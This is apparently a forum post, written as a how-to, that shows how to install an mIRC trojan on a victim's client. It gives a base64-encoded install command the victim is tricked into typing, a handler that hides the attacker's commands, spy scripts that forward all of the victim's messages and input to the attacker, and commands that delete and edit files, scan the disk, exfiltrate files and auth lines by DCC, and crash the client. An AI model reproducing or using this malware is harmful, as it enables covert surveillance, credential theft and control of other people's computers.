Here is an IRC Torjan
Here is a way to make an IRC trojan, it works perfectly with MIRC, didn't try it on other IRC clients to be honest.
now you need to install it on remote computer (Infect the victim)
The script can be activated by the remote PC when he writes the next command:
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAu***r***yLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you
YOURNICK = your nick. The remote computer will message you “I love you” once he writes the command. You can edit it or just delete the “ | msg YOURNICK I love you ” part.
This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }
The haltdef will block your messages to the remote PC beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC. You can naturally leave that part out of the command when you want to see the messages on the remote computer. However most of the times you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case by example).
Example:
/msg bot ins msg #channel hi
This will let the bot message #channel the “hi” message, but the remote PC will NOT see it, all others in the channel will see. And the bot will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn't get all the garbage data that it doesn't need.
When the bot has executed that command the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity or chatting). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:
Spy the remote PC (e.g. logging the activities for bots)
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $*- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($*,*) != /,< $+ $me $+ >,[COMMAND]) $*- }
/msg bot ins load -rs myscript.mrc
Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
/msg bot ins unload -rs myscript.mrc
Note: bot = the nick of the client who has executed that command, and who has the remote script activated RAT (aka Trojan).
Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:
/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $*- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($*,*) != /,< $+ $me $+ >,[COMMAND]) $*- }
/msg bot ins load -rs myscript.mrc
YOURNICK is your nick, and bot is the nick of the remote client.
Make other remote files (.mrc)
You can make remote files yourself and add usefull functions in it.
/msg bot insert write -c YOURSCRIPTNAME.mrc on *:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg bot ins .load –rs YOURSCRIPTNAMEt.mrc
Use of the Trojan
REMOVE FILE :
/msg bot ins remove C:\Textfile.txt
OPEN SITE:
/msg bot ins url [url]www.site.com[/url]
JOIN CHANNEL:
/msg bot ins join #channel
PART CHANNEL:
/msg bot ins part #channel
QUERY USER:
/msg bot ins query user
MSG USER:
/msg bot ins msg user
INVITE USER:
/msg bot ins invite user #channel
BAN USER:
/msg bot ins ban #channel user
KICK USER:
/msg bot ins kick #channel user
IGNORE USER:
/msg bot ins ignore *!*@host.com
UNIGNORE USER:
/msg bot ins unignore *!*@host.com
CHANGE NICK:
/msg bot ins nick thenickyouwant
OP USER:
/msg bot ins mode #channel +o user
VOICE USER:
/msg bot ins mode #channel +v user
CHANGE TOPIC:
/msg bot ins topic #channel text
RECEIVE FILE:
/msg bot ins dcc send user file
or
/msg bot ins dcc send user C:\something.sth
EDIT TEXT:
/msg bot ins write -l* C:\TESTING.txt thetextyouwanttoedit
(-l* --> first line)
READ A PIECE OF FILE (LIKE PERFORM):
following commands must be executed after eachother:
/msg bot ins write mab alias abcd*2* { msg user $read(perform.ini,w,*auth*) }
/msg bot ins .load -rs mab
/msg bot ins abcd*2*
SEARCH HARD DISK FOR A FILE:
/msg bot ins write MAB* alias MAB* { .echo $findfile(C:\,porn.*,0,msg user $*-) }
/msg bot ins .load -rs MAB*
/msg bot ins MAB*
LET HIS mIRC CRASH:
/msg bot ins write MAB2 alias MAB2 { while (* != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2
SCAN HIS HARD DISK AND SAVE IT AS .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $*-)
Note: Probably you want this file, well you do this:
/msg bot ins dcc send YOURNICK C:\M_A_B.txt
** Important note **
The bot will see the send dialog, so act quick, for security reasons i s***est to write another trojan on another file; like:
/msg bot write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAu***r***yLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc
TURN THE AUTO JOIN ON INVITE ON (or OFF)
/msg bot ins ajinvite on
LET THE BOT MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
/msg bot ins amsg <the message you want him to say on all channels>
CHANGE THE BOT'S ALTERNATIVE NICK:
/msg bot ins anick <nickname>
CHANGE THE BOT'S BACKGROUND PICTURE:
/msg bot ins background [-aemsgdluhcfnrtpx] [window] [filename]
with
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
/msg bot ins channel #CHANNELNAME
Note: the bot must be on #CHANNELNAME
CLEAR YOUR *****S BY CLEARING THE TEXT ON THE OPEN WINDOWS:
/msg bot ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
LET THE BOT CLIP***RD A SPECIFIED TEXT:
/msg bot ins clip***rd <the text you want to be clip***rded>
CLOSE THE OPEN QUERIES OF THE BOT:
/msg bot ins close
LET THE BOT QUIT mIRC:
/msg bot ins quit <the quit message you want>
LET THE BOT DISCONNECT FROM SERVER:
/msg bot ins disconnect
LET THE BOT CHANGE SERVER:
/msg bot ins server the.server.you.want
LET THE BOT OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
/msg bot ins server -m
/msg bot ins server the.server.you.want
LET THE BOT GIVE YOU FLAGS (if he is able to):
/msg bot ins msg |TheBot| chanlev #channel YOURNICK +flag
Note:
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick
CHANGE THE BOT'S FONT AND FONT SIZE:
/msg bot ins font -asgbd <fontsize> <fontname>
CHANGE THE BOT'S FULL NAME:
/msg bot ins fullname <name>
LET THE BOT REJOIN A CHANNEL:
/msg bot ins hop #CHANNEL
MAKE A NEW DIRECTORY ON THE BOT'S HARD DISK:
/msg bot ins mkdir <dirname>
NOTE:
bot = nick of the remote client
user = your nick
Reply With Quote